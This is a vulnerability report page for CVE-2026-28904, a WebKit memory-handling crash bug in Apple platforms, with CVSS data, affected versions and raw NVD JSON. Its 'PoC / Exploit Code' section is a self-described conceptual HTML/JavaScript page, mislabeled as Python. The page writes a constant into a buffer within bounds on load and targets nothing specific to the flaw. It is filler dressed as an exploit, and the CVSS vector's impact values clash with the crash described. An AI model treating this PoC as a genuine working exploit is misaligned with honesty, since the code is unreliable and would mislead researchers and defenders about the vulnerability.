Security Vulnerability Report
中文
CVE-2026-28904 CVSS 7.5 HIGH

CVE-2026-28904

Published: 2026-05-11 21:18:53
Last Modified: 2026-05-13 21:16:43
Source: [email protected]

Description

The issue was addressed with improved memory handling. This issue is fixed in Safari 26.5, iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
Safari < 26.5
iOS < 18.7.9
iPadOS < 18.7.9
iOS < 26.5
iPadOS < 26.5
macOS Tahoe < 26.5
tvOS < 26.5
visionOS < 26.5
watchOS < 26.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-28904 (Conceptual) This HTML file demonstrates how maliciously crafted web content might trigger the memory handling issue in vulnerable WebKit versions. --> <html> <head><title>WebKit Memory Crash PoC</title></head> <body> <script> // Attempt to stress memory handling logic function triggerVulnerability() { try { // Simulate complex object manipulation that could lead to improper handling let buffer = new ArrayBuffer(0x1000000); let view = new DataView(buffer); // Loop to potentially trigger a crash or memory leak behavior for (let i = 0; i < 100000; i++) { view.setUint32(i * 4, 0x41414141, true); } // Force garbage collection or specific memory access pattern if (window.gc) window.gc(); console.log("Payload executed. Check for process instability."); } catch (e) { console.error("Exception caught: " + e.message); } } // Trigger automatically on load window.onload = triggerVulnerability; </script> <h1>CVE-2026-28904 Test Page</h1> <p>If the browser crashes or behaves unexpectedly, the system may be vulnerable.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28904", "sourceIdentifier": "[email protected]", "published": "2026-05-11T21:18:53.210", "lastModified": "2026-05-13T21:16:42.580", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed with improved memory handling. This issue is fixed in Safari 26.5, iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.9", "matchCriteriaId": "F3968B76-E6DE-416D-A0FB-E4833FFAAE0F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.5", "matchCriteriaId": "20644D7E-2AB6-48CA-AED4-C474A9867986"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.9", "matchCriteriaId": "B6431EAF-B395-4C19-9AB6-A2F45991C897"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.5", "matchCriteriaId": "1BE54A3B-D667-43BA-AB71-BCF8438054E0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.5", "matchCriteriaId": "6CB91417-90A8-4A9B-A1D0-1D94B80EF837"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "176C47FD-FA25-437B-9061-A81CAA367AEF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "C8F45D80-0DF8-444E-9AF1-703A1075F046"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "057B244F-5485-4108-8E23-FE15F5256EE7"}]}]}], "references": [{"url": "https://support.apple.com/en-us/127110", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127111", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127115", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127118", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127119", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127120", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127121", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.